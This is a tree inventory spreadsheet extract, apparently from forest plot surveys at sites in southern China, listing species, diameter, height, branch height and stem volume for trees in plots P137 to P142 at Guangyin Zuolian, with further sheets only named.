Guangyin Zuolian	2	P137	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	4	5.5	3	0.00433941
Guangyin Zuolian	2	P137	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	7	6	4.5	0.0135042
Guangyin Zuolian	2	P137	Tiliaceae	Microcos	Microcos paniculata L.	MICPAN	3	2	1.4	0.000934077
Guangyin Zuolian	2	P137	Tiliaceae	Microcos	Microcos paniculata L.	MICPAN	6	3.5	1.5	0.00594767
Guangyin Zuolian	2	P137	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	3	3	1.8	0.0013926
Guangyin Zuolian	2	P137	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	1.7	1.4	0.000216911
Guangyin Zuolian	2	P137	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	20	9	4	0.144215
Guangyin Zuolian	2	P137	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	23	11	5	0.228397
Guangyin Zuolian	2	P138	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	10	5.5	3	0.0241973
Guangyin Zuolian	2	P138	Moraceae	Ficus	Ficus variolosa Lindl. ex Benth.	FICVAR	3	3.5	2	0.00162093
Guangyin Zuolian	2	P138	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	3	4.5	2.5	0.0020762
Guangyin Zuolian	2	P138	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	2	3	2	0.000650978
Guangyin Zuolian	2	P138	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	1.5	0.7	0.000191753
Guangyin Zuolian	2	P138	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.7	0.5	0.000101396
Guangyin Zuolian	2	P138	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.8	0.8	0.000107269
Guangyin Zuolian	2	P138	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	2	1	0.000118999
Guangyin Zuolian	2	P138	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2.5	2	1	0.000663557
Guangyin Zuolian	2	P138	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.2	2.5	0.4	0.000208689
Guangyin Zuolian	2	P138	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	1	2	0.8	0.000118999
Guangyin Zuolian	2	P138	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	2	0.5	0.00043664
Guangyin Zuolian	2	P138	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	3.5	2	0.000757716
Guangyin Zuolian	2	P138	Rhamnaceae	Ziziphus	Ziziphus jujuba var.spinosa(Bunge)Hu	ZIZJUJ	20	11	4	0.175732
Guangyin Zuolian	2	P138	Rhamnaceae	Ziziphus	Ziziphus jujuba var.spinosa(Bunge)Hu	ZIZJUJ	30	12	4	0.409572
Guangyin Zuolian	2	P138	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3	5	2	0.00230323
Guangyin Zuolian	2	P139	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	4	6.5	3	0.00511552
Guangyin Zuolian	2	P139	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	4	6.5	2	0.00511552
Guangyin Zuolian	2	P139	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	1.2	1.6	0.8	0.00013446
Guangyin Zuolian	2	P139	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	1.8	1.4	0.000229473
Guangyin Zuolian	2	P139	Euphorbiaceae	Croton	Croton lachnocarpus Benth.	CROLAC	1.5	3	1.2	0.000379528
Guangyin Zuolian	2	P139	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2.8	4	2.5	0.00162439
Guangyin Zuolian	2	P139	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	3	4.5	3	0.0020762
Guangyin Zuolian	2	P139	Ulmaceae	Celtis	Celtis tetrandra ssp. sinensis (Pers.) Y.C.Tang	CELTET	2.5	4	3	0.00131335
Guangyin Zuolian	2	P139	Ulmaceae	Celtis	Celtis tetrandra ssp. sinensis (Pers.) Y.C.Tang	CELTET	2.5	4	4	0.00131335
Guangyin Zuolian	2	P139	Ulmaceae	Celtis	Celtis tetrandra ssp. sinensis (Pers.) Y.C.Tang	CELTET	2.5	4	4	0.00131335
Guangyin Zuolian	2	P139	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	3	1.8	1.6	0.000842002
Guangyin Zuolian	2	P139	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	3	2	1.8	0.000934077
Guangyin Zuolian	2	P139	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	2.8	6	4	0.00242176
Guangyin Zuolian	2	P139	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2.5	6	4.5	0.00195805
Guangyin Zuolian	2	P139	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	15	8	4	0.0748697
Guangyin Zuolian	2	P140	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	2	0.5	0.000118999
Guangyin Zuolian	2	P140	Flacourtiaceae	Scolopia	Scolopia saeva	SCOSAE	1	2	1.2	0.000118999
Guangyin Zuolian	2	P140	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	5	4.5	2	0.00541185
Guangyin Zuolian	2	P140	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	2	2	1	0.00043664
Guangyin Zuolian	2	P140	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	1	2.5	1	0.00014825
Guangyin Zuolian	2	P140	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	1.5	2.5	0.5	0.000317142
Guangyin Zuolian	2	P140	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	2	2.5	1.8	0.000543971
Guangyin Zuolian	2	P140	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	5	4	2	0.00481906
Guangyin Zuolian	2	P140	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	6	1.5	0.0101137
Guangyin Zuolian	2	P140	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	18	10	7	0.131299
Guangyin Zuolian	2	P140	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	2	0.5	0.000254566
Guangyin Zuolian	2	P140	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	1	2.5	1.5	0.00014825
Guangyin Zuolian	2	P140	Euphorbiaceae	Croton	Croton lachnocarpus Benth.	CROLAC	12	5	4	0.03101
Guangyin Zuolian	2	P140	Euphorbiaceae	Croton	Croton lachnocarpus Benth.	CROLAC	16	6	3.5	0.0636523
Guangyin Zuolian	2	P140	Euphorbiaceae	Croton	Croton lachnocarpus Benth.	CROLAC	18	6	4.5	0.0793872
Guangyin Zuolian	2	P140	Euphorbiaceae	Croton	Croton lachnocarpus Benth.	CROLAC	20	7	3	0.112592
Guangyin Zuolian	2	P140	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	2	3	2	0.000650978
Guangyin Zuolian	2	P140	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	2.5	3.5	3	0.00115149
Guangyin Zuolian	2	P140	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	4	4	2.5	0.00317108
Guangyin Zuolian	2	P140	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	5	4	0.00600364
Guangyin Zuolian	2	P140	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	7	3.5	0.0201917
Guangyin Zuolian	2	P140	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	8	3	0.0349983
Guangyin Zuolian	2	P140	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	8.5	3	0.0794765
Guangyin Zuolian	2	P140	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	25	9	2	0.219163
Guangyin Zuolian	2	P140	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	2	0.7	0.00043664
Guangyin Zuolian	2	P140	Euphorbiaceae	Bischofia	Bischofia javanica Bl.	BISJAV	5	3.5	2.5	0.00422516
Guangyin Zuolian	2	P140	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	12	4.5	1.8	0.0279532
Guangyin Zuolian	2	P140	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	6	5.5	2	0.00928302
Guangyin Zuolian	2	P140	Thymelaeaceae	Wikstroemia	Wikstroemia nutans Champ.	WIKNUT	5	3	1.5	0.00362997
Guangyin Zuolian	2	P140	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	4.5	1.8	0.00761816
Guangyin Zuolian	2	P140	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	5	2	0.0112844
Guangyin Zuolian	2	P141	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	10	8	6.5	0.0349983
Guangyin Zuolian	2	P141	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	2	3	1.5	0.000650978
Guangyin Zuolian	2	P141	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	5	6	4	0.00718464
Guangyin Zuolian	2	P141	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	18	13	10	0.170017
Guangyin Zuolian	2	P141	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	20	13	10	0.207162
Guangyin Zuolian	2	P141	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	23	13	10	0.269246
Guangyin Zuolian	2	P141	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	26	13	10	0.338853
Guangyin Zuolian	2	P141	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	6	7	4.5	0.011772
Guangyin Zuolian	2	P141	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	6	7	5	0.011772
Guangyin Zuolian	2	P141	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	7	7	4.5	0.0157184
Guangyin Zuolian	2	P141	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	6	8	6	0.0134267
Guangyin Zuolian	2	P141	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	8	8	6	0.0230299
Guangyin Zuolian	2	P141	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	13	8	6	0.0572463
Guangyin Zuolian	2	P141	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	8	11	9.5	0.0315148
Guangyin Zuolian	2	P141	Mimosaceae	Pithecellobium	Pithecellobium lucidum Benth.	PITLUC	3	4	3	0.00184878
Guangyin Zuolian	2	P141	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	1	3	1.5	0.000177413
Guangyin Zuolian	2	P141	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	2	4	3.5	0.000864223
Guangyin Zuolian	2	P141	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	4	4	2.5	0.00317108
Guangyin Zuolian	2	P141	Euphorbiaceae	Croton	Croton lachnocarpus Benth.	CROLAC	12	7	5	0.0431948
Guangyin Zuolian	2	P141	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	14	8	9	0.0657824
Guangyin Zuolian	2	P141	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	20	13	11	0.207162
Guangyin Zuolian	2	P141	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	3.5	2	0.00278028
Guangyin Zuolian	2	P141	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	5	4	0.00107666
Guangyin Zuolian	2	P142	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	2	2	1.5	0.00043664
Guangyin Zuolian	2	P142	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	2	2	1.4	0.00043664
Guangyin Zuolian	2	P142	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	4	4.5	2	0.00356116
Guangyin Zuolian	2	P142	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	6	6	3	0.0101137
[truncated: 2,415 more rows]

## Sheet: Pubuxia
Site	Stand	Plot	Family	Genus	Species	SpCode	DBH/cm	Height/m	Branch.h/m	Volume/m3
[truncated: 3,289 more rows]

[truncated: 3 more sheets: Xiegang, Jieshi, SZSOSRPN]
